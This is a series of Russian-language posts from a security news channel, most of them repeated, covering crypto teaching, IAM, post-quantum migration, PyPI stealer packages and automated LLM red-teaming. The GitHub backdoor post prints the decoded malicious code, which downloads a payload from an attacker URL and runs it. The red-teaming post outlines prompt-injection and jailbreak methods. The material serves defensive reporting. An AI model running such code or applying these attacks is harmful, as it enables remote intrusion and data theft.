🧑🏫 Учим школьников криптографии: инструмент CryptoEL для увлекательного и практического обучения
📚 В современном мире, где цифровая безопасность становится важнее с каждым днём, криптография остаётся сложной, но необходимой темой. Специалисты из Университета Массачусетса Лоуэлла разработали CryptoEL, инновационный инструмент, который делает обучение криптографии увлекательным и доступным для школьников.
Что такое CryptoEL?
CryptoEL основан на модели обучения через опыт (Experiential Learning) и включает четыре этапа:
1. Конкретный опыт — учащиеся погружаются в сценарии из реальной жизни, наблюдая за передачей данных в идеальных и уязвимых условиях.
2. Рефлексивное наблюдение — анализ происходящего через беседы с AI-ассистентом CryptoCoach.
3. Абстрактная концептуализация — изучение концепций криптографии через интерактивные видеоматериалы и симуляции.
4. Активный эксперимент — выполнение практических заданий с использованием встроенного терминала Python.
Такой подход позволяет школьникам не только понять теорию, но и применить знания на практике, решая реальные задачи в области безопасности данных.
Основные модули CryptoEL
1. Хеширование 🔐 В модуле демонстрируется, как защита данных помогает сохранять их целостность. Ученики видят, как атаки могут изменить сообщения, и изучают, как хеширование позволяет защититься от этих изменений.
2. Симметричная криптография 📤 Используя сценарий с чат-приложением, школьники узнают, как шифрование данных помогает обеспечить конфиденциальность. Они учатся генерировать ключи, шифровать сообщения и предотвращать атаки.
3. Асимметричная криптография 🛡️ Здесь учащиеся работают с ключами для шифрования и дешифрования, что помогает им понять, как функционируют системы с публичными и приватными ключами, используемые в современных протоколах безопасности.
🔎 Опросы показали, что лишь 5% старшеклассников и менее 1% учеников средней школы изучают криптографию. CryptoEL восполняет этот пробел, делая сложные концепции доступными через визуализации, интерактивные задания и AI-помощь.
Результаты тестирования
🧪 Исследование с участием 51 школьника показало:
- 93% участников сочли инструмент полезным и увлекательным.
- Уровень понимания криптографических концепций после обучения вырос на 85–95%.
- Школьники отметили, что интерактивные симуляции и визуализации помогают легче усваивать материал.
Stay secure and read SecureTechTalks 📚
#CryptoEL #Кибербезопасность #Образование #Шифрование
📚 В современном мире, где цифровая безопасность становится важнее с каждым днём, криптография остаётся сложной, но необходимой темой. Специалисты из Университета Массачусетса Лоуэлла разработали CryptoEL, инновационный инструмент, который делает обучение криптографии увлекательным и доступным для школьников.
Что такое CryptoEL?
CryptoEL основан на модели обучения через опыт (Experiential Learning) и включает четыре этапа:
1. Конкретный опыт — учащиеся погружаются в сценарии из реальной жизни, наблюдая за передачей данных в идеальных и уязвимых условиях.
2. Рефлексивное наблюдение — анализ происходящего через беседы с AI-ассистентом CryptoCoach.
3. Абстрактная концептуализация — изучение концепций криптографии через интерактивные видеоматериалы и симуляции.
4. Активный эксперимент — выполнение практических заданий с использованием встроенного терминала Python.
Такой подход позволяет школьникам не только понять теорию, но и применить знания на практике, решая реальные задачи в области безопасности данных.
Основные модули CryptoEL
1. Хеширование 🔐 В модуле демонстрируется, как защита данных помогает сохранять их целостность. Ученики видят, как атаки могут изменить сообщения, и изучают, как хеширование позволяет защититься от этих изменений.
2. Симметричная криптография 📤 Используя сценарий с чат-приложением, школьники узнают, как шифрование данных помогает обеспечить конфиденциальность. Они учатся генерировать ключи, шифровать сообщения и предотвращать атаки.
3. Асимметричная криптография 🛡️ Здесь учащиеся работают с ключами для шифрования и дешифрования, что помогает им понять, как функционируют системы с публичными и приватными ключами, используемые в современных протоколах безопасности.
🔎 Опросы показали, что лишь 5% старшеклассников и менее 1% учеников средней школы изучают криптографию. CryptoEL восполняет этот пробел, делая сложные концепции доступными через визуализации, интерактивные задания и AI-помощь.
Результаты тестирования
🧪 Исследование с участием 51 школьника показало:
- 93% участников сочли инструмент полезным и увлекательным.
- Уровень понимания криптографических концепций после обучения вырос на 85–95%.
- Школьники отметили, что интерактивные симуляции и визуализации помогают легче усваивать материал.
Stay secure and read SecureTechTalks 📚
#CryptoEL #Кибербезопасность #Образование #Шифрование
⚠️ GitHub атакован: вредоносные коммиты с бэкдорами
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность
👍1
🔐 Искусственный интеллект и управление доступом: новая эра безопасности
🤖 Искусственный интеллект и управление доступом кардинально меняют подходы к обеспечению безопасности. Сегодня IAM выходит за рамки защиты человеческих идентификаторов и охватывает автономные системы, API и подключенные устройства.
📊 Как AI влияет на ключевые элементы IAM?
🛡️ Интеллектуальный мониторинг и обнаружение аномалий
AI анализирует поведение как человеческих, так и машинных идентификаторов, включая API и сервисные учетные записи. Он создает базовые показатели "нормального" поведения и мгновенно обнаруживает отклонения, сигнализирующие о возможных угрозах.
Например, AI может выявить необычные модели доступа в контейнеризированных приложениях или аномальные объемы передачи данных, предотвращая потенциальные утечки на ранних стадиях.
📜 Расширенное управление доступом (Access Governance)
AI позволяет реализовать принцип наименьших привилегий, анализируя поведенческие данные идентификаторов и автоматизируя управление правами. В реальном времени система выявляет нарушения политик и адаптирует настройки безопасности под текущую ситуацию.
Кроме того, AI обеспечивает контекстно-зависимую аутентификацию, оценивая риск на основе данных о чувствительности ресурсов и текущей угрозе, создавая надежную защиту без помех для легитимных пользователей.
🚀 Улучшение пользовательского опыта
AI оптимизирует процесс управления доступом:
- Автоматизация назначения ролей на основе функционала сотрудников.
- Реализация динамического доступа Just-in-Time (JIT), который активируется только при необходимости. Это минимизирует привилегии, которые могут быть использованы злоумышленниками.
🛠️ Персонализация и настройка
AI анализирует поведение пользователей и рабочие процессы, автоматически предлагая индивидуализированные настройки, которые уменьшают риски.
Например, временные сотрудники получают доступ, ограниченный сроком их работы, а подрядчикам предоставляются только те права, которые необходимы для выполнения задач.
🔎 Снижение ложных срабатываний
Традиционные системы обнаружения угроз часто страдают от высокого уровня ложных срабатываний. AI анализирует большие массивы данных, чтобы минимизировать такие ошибки и сосредоточиться на реальных угрозах, что ускоряет реакцию и оптимизирует использование ресурсов.
🛠️ Практическое применение AI в IAM
1. Управление привилегированным доступом (PAM)
AI отслеживает и блокирует подозрительные действия привилегированных учетных записей.
💡 Например, если поведение отклоняется от обычного, система автоматически завершает сессию.
2. Управление идентификацией и администрирование (IGA)
AI автоматизирует жизненный цикл машинных идентификаторов, минимизируя избыточные привилегии. Это особенно важно в условиях масштабируемых облачных сред.
3. Управление секретами
AI помогает управлять ключами и паролями, прогнозируя сроки их действия и предлагая автоматическую ротацию для высокорискованных секретов. Это распространяется на DevOps-платформы, CI/CD, и инструменты совместной работы.
🧠 Атаки на машинные идентификаторы
С помощью машинного обучения AI может моделировать атаки на машинные идентификаторы, выявляя потенциальные слабые места. Это позволяет компаниям заранее усиливать защиту и улучшать стратегию IAM.
🔮 Будущее IAM с AI
Эволюция IAM превращает кибербезопасность из реактивного подхода в проактивный. Искусственный интеллект не только защищает, но и прогнозирует угрозы, адаптируя защитные механизмы под новые вызовы.
Stay secure and read SecureTechTalks 📚
#IAM #AI #Кибербезопасность #УправлениеДоступом #МашинноеОбучение
🤖 Искусственный интеллект и управление доступом кардинально меняют подходы к обеспечению безопасности. Сегодня IAM выходит за рамки защиты человеческих идентификаторов и охватывает автономные системы, API и подключенные устройства.
📊 Как AI влияет на ключевые элементы IAM?
🛡️ Интеллектуальный мониторинг и обнаружение аномалий
AI анализирует поведение как человеческих, так и машинных идентификаторов, включая API и сервисные учетные записи. Он создает базовые показатели "нормального" поведения и мгновенно обнаруживает отклонения, сигнализирующие о возможных угрозах.
Например, AI может выявить необычные модели доступа в контейнеризированных приложениях или аномальные объемы передачи данных, предотвращая потенциальные утечки на ранних стадиях.
📜 Расширенное управление доступом (Access Governance)
AI позволяет реализовать принцип наименьших привилегий, анализируя поведенческие данные идентификаторов и автоматизируя управление правами. В реальном времени система выявляет нарушения политик и адаптирует настройки безопасности под текущую ситуацию.
Кроме того, AI обеспечивает контекстно-зависимую аутентификацию, оценивая риск на основе данных о чувствительности ресурсов и текущей угрозе, создавая надежную защиту без помех для легитимных пользователей.
🚀 Улучшение пользовательского опыта
AI оптимизирует процесс управления доступом:
- Автоматизация назначения ролей на основе функционала сотрудников.
- Реализация динамического доступа Just-in-Time (JIT), который активируется только при необходимости. Это минимизирует привилегии, которые могут быть использованы злоумышленниками.
🛠️ Персонализация и настройка
AI анализирует поведение пользователей и рабочие процессы, автоматически предлагая индивидуализированные настройки, которые уменьшают риски.
Например, временные сотрудники получают доступ, ограниченный сроком их работы, а подрядчикам предоставляются только те права, которые необходимы для выполнения задач.
🔎 Снижение ложных срабатываний
Традиционные системы обнаружения угроз часто страдают от высокого уровня ложных срабатываний. AI анализирует большие массивы данных, чтобы минимизировать такие ошибки и сосредоточиться на реальных угрозах, что ускоряет реакцию и оптимизирует использование ресурсов.
🛠️ Практическое применение AI в IAM
1. Управление привилегированным доступом (PAM)
AI отслеживает и блокирует подозрительные действия привилегированных учетных записей.
💡 Например, если поведение отклоняется от обычного, система автоматически завершает сессию.
2. Управление идентификацией и администрирование (IGA)
AI автоматизирует жизненный цикл машинных идентификаторов, минимизируя избыточные привилегии. Это особенно важно в условиях масштабируемых облачных сред.
3. Управление секретами
AI помогает управлять ключами и паролями, прогнозируя сроки их действия и предлагая автоматическую ротацию для высокорискованных секретов. Это распространяется на DevOps-платформы, CI/CD, и инструменты совместной работы.
🧠 Атаки на машинные идентификаторы
С помощью машинного обучения AI может моделировать атаки на машинные идентификаторы, выявляя потенциальные слабые места. Это позволяет компаниям заранее усиливать защиту и улучшать стратегию IAM.
🔮 Будущее IAM с AI
Эволюция IAM превращает кибербезопасность из реактивного подхода в проактивный. Искусственный интеллект не только защищает, но и прогнозирует угрозы, адаптируя защитные механизмы под новые вызовы.
Stay secure and read SecureTechTalks 📚
#IAM #AI #Кибербезопасность #УправлениеДоступом #МашинноеОбучение
👍1
🛡Стратегия защиты от квантовых угроз
🔒 Квантовые компьютеры и угроза безопасности
С развитием квантовых технологий наши привычные системы шифрования сталкиваются с новой реальностью. Алгоритмы, такие как RSA, основанные на сложных математических расчетах, могут быть вскоре скомпрометированы квантовыми компьютерами. Доклад NIST предлагает стратегическую дорожную карту для перехода к квантово-устойчивой криптографии, способной защитить данные в этой новой эре.
🔍 Квантовые компьютеры способны взламывать многие современные шифры, ставя под угрозу долгосрочные данные. Утечка данных сегодня может обернуться их расшифровкой через несколько лет, когда квантовые системы станут более развитыми. Документ предлагает комплексный подход к подготовке организаций к таким вызовам.
🛤 Трехуровневая стратегия перехода: STL-QCRYPTO
Разработанная структура охватывает три ключевых уровня безопасности:
1️⃣ STL-1: Основной уровень
Использование алгоритмов постквантовой криптографии, таких как CRYSTAL-Kyber и SPHINCS+.
Подходит для быстрого внедрения с минимальными изменениями в инфраструктуре.
2️⃣ STL-2: Промежуточный уровень
Гибридный подход: использование квантовых генераторов случайных чисел (QRNG) совместно с классическими алгоритмами.
Усиление защиты через истинно случайные ключи.
3️⃣ STL-3: Продвинутый уровень
Переход на квантовую криптографию (QKD) для максимально безопасного обмена ключами.
Полный переход на квантовые технологии требует значительных ресурсов, но обеспечивает непревзойденную безопасность.
🔗 Подробнее про исследование можно прочитать тут.
Stay secure and read SecureTechTalks 📚
#КвантоваяКриптография #Кибербезопасность #ПостквантоваяЗащита #SecureTechTalks
🔒 Квантовые компьютеры и угроза безопасности
С развитием квантовых технологий наши привычные системы шифрования сталкиваются с новой реальностью. Алгоритмы, такие как RSA, основанные на сложных математических расчетах, могут быть вскоре скомпрометированы квантовыми компьютерами. Доклад NIST предлагает стратегическую дорожную карту для перехода к квантово-устойчивой криптографии, способной защитить данные в этой новой эре.
🔍 Квантовые компьютеры способны взламывать многие современные шифры, ставя под угрозу долгосрочные данные. Утечка данных сегодня может обернуться их расшифровкой через несколько лет, когда квантовые системы станут более развитыми. Документ предлагает комплексный подход к подготовке организаций к таким вызовам.
🛤 Трехуровневая стратегия перехода: STL-QCRYPTO
Разработанная структура охватывает три ключевых уровня безопасности:
1️⃣ STL-1: Основной уровень
Использование алгоритмов постквантовой криптографии, таких как CRYSTAL-Kyber и SPHINCS+.
Подходит для быстрого внедрения с минимальными изменениями в инфраструктуре.
2️⃣ STL-2: Промежуточный уровень
Гибридный подход: использование квантовых генераторов случайных чисел (QRNG) совместно с классическими алгоритмами.
Усиление защиты через истинно случайные ключи.
3️⃣ STL-3: Продвинутый уровень
Переход на квантовую криптографию (QKD) для максимально безопасного обмена ключами.
Полный переход на квантовые технологии требует значительных ресурсов, но обеспечивает непревзойденную безопасность.
🔗 Подробнее про исследование можно прочитать тут.
Stay secure and read SecureTechTalks 📚
#КвантоваяКриптография #Кибербезопасность #ПостквантоваяЗащита #SecureTechTalks
👍1
🛡️ Учим школьников безопасности в интернете: бесплатный курс от Яндекса
🖥️ «Яндекс Браузер для образования» в сотрудничестве с «Яндекс Учебником» представили новый онлайн-курс для школьников 7-9 классов. Этот образовательный проект обучает базовым навыкам безопасного поведения в интернете: как распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли.
📊 Проблема актуальна как никогда: по данным исследований, около 72% школьников сталкиваются с онлайн-мошенничеством. Ежедневно «Яндекс Браузер» блокирует более 600 мошеннических доменов, многие из которых маскируются под игровые сайты. Такие ресурсы заманивают школьников обещаниями бесплатных бонусов, раннего доступа к играм или участия в турнирах с призами. После перехода по ссылкам детей просят ввести свои логины и пароли, которые затем попадают к злоумышленникам.
🔍 Как защитить школьников?
Курс предлагает погрузиться в интерактивный детективный квест, где школьники на практике учатся:
- Различать фишинговые сайты;
- Понимать, зачем нужна двухфакторная аутентификация;
- Создавать и использовать надёжные пароли.
📚 Структура курса
Курс включает два урока продолжительностью по 20-25 минут:
1️⃣ Защита аккаунтов: как настроить безопасность и предотвратить утечку данных.
2️⃣ Распознавание мошеннических сайтов: что такое фишинг и как не попасться на уловки злоумышленников.
Учителя могут использовать эти материалы на уроках информатики или рекомендовать их для самостоятельного изучения дома.
🔒 О проекте «Яндекс Браузер для образования»
Эта специальная версия браузера создана для школ и образовательных учреждений. Она:
- Очищает все пользовательские данные после окончания урока;
- Фильтрует контент, ограничивая доступ к нежелательным ресурсам;
- Помогает создавать безопасное цифровое пространство для учеников и учителей.
🌐 Доступ к курсу бесплатный. Он размещён на платформе «Яндекс Учебник» и доступен каждому.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #цифроваяграмотность #SecureTechTalks #интернетбезопасность #Яндекс
🖥️ «Яндекс Браузер для образования» в сотрудничестве с «Яндекс Учебником» представили новый онлайн-курс для школьников 7-9 классов. Этот образовательный проект обучает базовым навыкам безопасного поведения в интернете: как распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли.
📊 Проблема актуальна как никогда: по данным исследований, около 72% школьников сталкиваются с онлайн-мошенничеством. Ежедневно «Яндекс Браузер» блокирует более 600 мошеннических доменов, многие из которых маскируются под игровые сайты. Такие ресурсы заманивают школьников обещаниями бесплатных бонусов, раннего доступа к играм или участия в турнирах с призами. После перехода по ссылкам детей просят ввести свои логины и пароли, которые затем попадают к злоумышленникам.
🔍 Как защитить школьников?
Курс предлагает погрузиться в интерактивный детективный квест, где школьники на практике учатся:
- Различать фишинговые сайты;
- Понимать, зачем нужна двухфакторная аутентификация;
- Создавать и использовать надёжные пароли.
📚 Структура курса
Курс включает два урока продолжительностью по 20-25 минут:
1️⃣ Защита аккаунтов: как настроить безопасность и предотвратить утечку данных.
2️⃣ Распознавание мошеннических сайтов: что такое фишинг и как не попасться на уловки злоумышленников.
Учителя могут использовать эти материалы на уроках информатики или рекомендовать их для самостоятельного изучения дома.
🔒 О проекте «Яндекс Браузер для образования»
Эта специальная версия браузера создана для школ и образовательных учреждений. Она:
- Очищает все пользовательские данные после окончания урока;
- Фильтрует контент, ограничивая доступ к нежелательным ресурсам;
- Помогает создавать безопасное цифровое пространство для учеников и учителей.
🌐 Доступ к курсу бесплатный. Он размещён на платформе «Яндекс Учебник» и доступен каждому.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #цифроваяграмотность #SecureTechTalks #интернетбезопасность #Яндекс
👍1
🚨 Внимание: вредоносные пакеты на PyPI крадут данные через поддельные библиотеки ChatGPT и Claude AI
🛡️ Исследователи обнаружили два вредоносных пакета на платформе Python Package Index (PyPI), которые маскировались под популярные модели искусственного интеллекта ChatGPT и Claude AI. Пакеты, названные gptplus и claudeai-eng, содержали вредоносное ПО JarkaStealer, предназначенное для кражи конфиденциальной информации.
📦 Как работали пакеты?
Оба пакета были загружены пользователем под псевдонимом "Xeroline" в ноябре 2023 года и суммарно скачаны более 3,500 раз до удаления с PyPI. Пакеты якобы предоставляли доступ к API GPT-4 Turbo и Claude AI, но на деле содержали вредоносный код:
1️⃣ При установке пакетов выполнялся файл init.py, содержащий Base64-закодированные данные.
2️⃣ Код загружал файл JavaUpdater.jar из репозитория GitHub и, при необходимости, скачивал Java Runtime Environment (JRE) из Dropbox.
3️⃣ Запускался JavaUpdater.jar, который активировал JarkaStealer — вредоносный инструмент для кражи данных.
📂 Что крадёт JarkaStealer?
- Данные браузеров (включая пароли и куки).
- Системную информацию.
- Скриншоты.
- Токены сессий приложений, таких как Telegram, Discord, Steam.
Все собранные данные архивировались, отправлялись на сервер атакующего и затем удалялись с устройства жертвы.
💻 Кто пострадал?
По данным ClickPy, наибольшее количество загрузок пакетов зафиксировано в США, Китае, Индии, Франции, Германии и России. Эта кампания стала частью годового цикла атак на цепочку поставок программного обеспечения.
💰 JarkaStealer как MaaS
JarkaStealer распространяется через Telegram-каналы в модели "малварь как услуга" (MaaS). Стоимость варьируется от $20 до $50, а исходный код даже был слит в публичный доступ на GitHub.
🔑 Что делать разработчикам?
1⃣ Всегда проверяйте подлинность библиотек перед их установкой.
2⃣ Используйте инструменты для анализа зависимостей и уязвимостей в open-source компонентах.
3⃣ Будьте особенно внимательны к недавно опубликованным пакетам и тем, у которых минимальные отзывы.
4⃣ Регулярно обновляйте антивирусное ПО и проводите аудит своих проектов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #поставкиПО #PyPI #SecureTechTalks #вредоносноеПО #OpenSourceРиски
🛡️ Исследователи обнаружили два вредоносных пакета на платформе Python Package Index (PyPI), которые маскировались под популярные модели искусственного интеллекта ChatGPT и Claude AI. Пакеты, названные gptplus и claudeai-eng, содержали вредоносное ПО JarkaStealer, предназначенное для кражи конфиденциальной информации.
📦 Как работали пакеты?
Оба пакета были загружены пользователем под псевдонимом "Xeroline" в ноябре 2023 года и суммарно скачаны более 3,500 раз до удаления с PyPI. Пакеты якобы предоставляли доступ к API GPT-4 Turbo и Claude AI, но на деле содержали вредоносный код:
1️⃣ При установке пакетов выполнялся файл init.py, содержащий Base64-закодированные данные.
2️⃣ Код загружал файл JavaUpdater.jar из репозитория GitHub и, при необходимости, скачивал Java Runtime Environment (JRE) из Dropbox.
3️⃣ Запускался JavaUpdater.jar, который активировал JarkaStealer — вредоносный инструмент для кражи данных.
📂 Что крадёт JarkaStealer?
- Данные браузеров (включая пароли и куки).
- Системную информацию.
- Скриншоты.
- Токены сессий приложений, таких как Telegram, Discord, Steam.
Все собранные данные архивировались, отправлялись на сервер атакующего и затем удалялись с устройства жертвы.
💻 Кто пострадал?
По данным ClickPy, наибольшее количество загрузок пакетов зафиксировано в США, Китае, Индии, Франции, Германии и России. Эта кампания стала частью годового цикла атак на цепочку поставок программного обеспечения.
💰 JarkaStealer как MaaS
JarkaStealer распространяется через Telegram-каналы в модели "малварь как услуга" (MaaS). Стоимость варьируется от $20 до $50, а исходный код даже был слит в публичный доступ на GitHub.
🔑 Что делать разработчикам?
1⃣ Всегда проверяйте подлинность библиотек перед их установкой.
2⃣ Используйте инструменты для анализа зависимостей и уязвимостей в open-source компонентах.
3⃣ Будьте особенно внимательны к недавно опубликованным пакетам и тем, у которых минимальные отзывы.
4⃣ Регулярно обновляйте антивирусное ПО и проводите аудит своих проектов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #поставкиПО #PyPI #SecureTechTalks #вредоносноеПО #OpenSourceРиски
👍1
🛡Расширенные подходы к Red Teaming: автоматизация и диверсификация атак
Исследователи из OpenAI представили усовершенствованный подход к автоматизированному Red Teaming, направленный на выявление слабостей моделей машинного обучения. Работа акцентирует внимание на создании атак, которые одновременно разнообразны и эффективны. В статье выделены основные методы, используемые для построения более надежной системы:
🔍 Система автоматического поиска уязвимостей
Red Teaming делится на два ключевых этапа:
1⃣ Генерация разнообразных целей атаки. Использование больших языковых моделей (LLM) для создания разнообразных сценариев атак.
2⃣ Создание успешных атак. Обучение атакующей модели (Red Team) на основе генеративных целей с применением методов многослойного обучения с подкреплением (RL).
📈 Нововведения в области обучения атакующих моделей
1⃣ Диверсифицированные цели: Сценарии атак включают как "инъекции запросов" (Prompt Injection), так и "jailbreaking" для обхода правил безопасности.
2⃣ Награды на основе правил: Используются автоматические функции наград, оценивающие успех атаки по заранее заданным критериям.
3⃣ Многошаговое обучение: Модель поощряется за создание новых, не похожих на предыдущие атаки, что увеличивает разнообразие.
🛠 Примеры применения
- Инъекции запросов: Встраивание вредоносных инструкций в данные третьих сторон, чтобы модель нарушала правила.
- Jailbreaking: Принуждение модели к генерации нежелательного контента.
🧠 Ключевые достижения
- Увеличение разнообразия атак на 30% по сравнению с традиционными методами.
- Улучшенная адаптивность атакующих моделей для реальных сценариев.
🚀 Практическая ценность
Исследование позволяет компаниям создавать более надежные механизмы защиты, тестируя модели на реальные угрозы. Подходы, описанные в статье, применимы для проверки безопасности AI-моделей, используемых в здравоохранении, финансах и других критически важных сферах.
🔗 Полный текст исследования доступен здесь.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #RedTeaming #AI
Исследователи из OpenAI представили усовершенствованный подход к автоматизированному Red Teaming, направленный на выявление слабостей моделей машинного обучения. Работа акцентирует внимание на создании атак, которые одновременно разнообразны и эффективны. В статье выделены основные методы, используемые для построения более надежной системы:
🔍 Система автоматического поиска уязвимостей
Red Teaming делится на два ключевых этапа:
1⃣ Генерация разнообразных целей атаки. Использование больших языковых моделей (LLM) для создания разнообразных сценариев атак.
2⃣ Создание успешных атак. Обучение атакующей модели (Red Team) на основе генеративных целей с применением методов многослойного обучения с подкреплением (RL).
📈 Нововведения в области обучения атакующих моделей
1⃣ Диверсифицированные цели: Сценарии атак включают как "инъекции запросов" (Prompt Injection), так и "jailbreaking" для обхода правил безопасности.
2⃣ Награды на основе правил: Используются автоматические функции наград, оценивающие успех атаки по заранее заданным критериям.
3⃣ Многошаговое обучение: Модель поощряется за создание новых, не похожих на предыдущие атаки, что увеличивает разнообразие.
🛠 Примеры применения
- Инъекции запросов: Встраивание вредоносных инструкций в данные третьих сторон, чтобы модель нарушала правила.
- Jailbreaking: Принуждение модели к генерации нежелательного контента.
🧠 Ключевые достижения
- Увеличение разнообразия атак на 30% по сравнению с традиционными методами.
- Улучшенная адаптивность атакующих моделей для реальных сценариев.
🚀 Практическая ценность
Исследование позволяет компаниям создавать более надежные механизмы защиты, тестируя модели на реальные угрозы. Подходы, описанные в статье, применимы для проверки безопасности AI-моделей, используемых в здравоохранении, финансах и других критически важных сферах.
🔗 Полный текст исследования доступен здесь.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #RedTeaming #AI
👍2
🔒 Минпромторг России инициирует создание национальной системы кибербезопасности автомобилей
В ответ на растущие угрозы кибератак на современные автомобили, Министерство промышленности и торговли Российской Федерации (Минпромторг) заказало экспертно-аналитическое исследование для разработки предложений по созданию национальной системы кибербезопасности транспортных средств.
🚗 Уязвимости современных автомобилей
Современные автомобили оснащены множеством электронных систем, включая блоки управления двигателем, тормозной системой и системами помощи водителю. Эти компоненты, будучи подключенными к интернету, становятся потенциальными целями для хакеров.
Возможные атаки могут привести к:
- Удаленному управлению автомобилем: злоумышленники могут получить контроль над основными функциями транспортного средства.
- Кражам данных: сбор информации о маршрутах, привычках водителя и других конфиденциальных данных.
- Нарушению работы систем безопасности: отключение или искажение работы систем, обеспечивающих безопасность пассажиров.
🔧 Планы Минпромторга
В рамках инициативы планируется:
- Разработка стандартов кибербезопасности: установление требований к производителям автомобилей и компонентов для обеспечения защиты от кибератак.
- Создание системы сертификации: проверка транспортных средств на соответствие установленным стандартам безопасности.
- Обучение специалистов: подготовка кадров, способных выявлять и предотвращать киберугрозы в автомобильной отрасли.
🌐 Международный опыт
Многие страны уже внедряют меры по обеспечению кибербезопасности автомобилей. Например, в Европейском Союзе с 2022 года действуют требования к производителям по обеспечению защиты от кибератак, а в США Национальная администрация безопасности дорожного движения (NHTSA) разрабатывает рекомендации для автопроизводителей.
🔍 Инициатива Минпромторга направлена на повышение уровня безопасности российских автомобилей в условиях цифровизации и роста киберугроз. Создание национальной системы кибербезопасности транспортных средств позволит защитить водителей и пассажиров от потенциальных рисков, связанных с кибератаками.
Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Автомобили #Минпромторг
В ответ на растущие угрозы кибератак на современные автомобили, Министерство промышленности и торговли Российской Федерации (Минпромторг) заказало экспертно-аналитическое исследование для разработки предложений по созданию национальной системы кибербезопасности транспортных средств.
🚗 Уязвимости современных автомобилей
Современные автомобили оснащены множеством электронных систем, включая блоки управления двигателем, тормозной системой и системами помощи водителю. Эти компоненты, будучи подключенными к интернету, становятся потенциальными целями для хакеров.
Возможные атаки могут привести к:
- Удаленному управлению автомобилем: злоумышленники могут получить контроль над основными функциями транспортного средства.
- Кражам данных: сбор информации о маршрутах, привычках водителя и других конфиденциальных данных.
- Нарушению работы систем безопасности: отключение или искажение работы систем, обеспечивающих безопасность пассажиров.
🔧 Планы Минпромторга
В рамках инициативы планируется:
- Разработка стандартов кибербезопасности: установление требований к производителям автомобилей и компонентов для обеспечения защиты от кибератак.
- Создание системы сертификации: проверка транспортных средств на соответствие установленным стандартам безопасности.
- Обучение специалистов: подготовка кадров, способных выявлять и предотвращать киберугрозы в автомобильной отрасли.
🌐 Международный опыт
Многие страны уже внедряют меры по обеспечению кибербезопасности автомобилей. Например, в Европейском Союзе с 2022 года действуют требования к производителям по обеспечению защиты от кибератак, а в США Национальная администрация безопасности дорожного движения (NHTSA) разрабатывает рекомендации для автопроизводителей.
🔍 Инициатива Минпромторга направлена на повышение уровня безопасности российских автомобилей в условиях цифровизации и роста киберугроз. Создание национальной системы кибербезопасности транспортных средств позволит защитить водителей и пассажиров от потенциальных рисков, связанных с кибератаками.
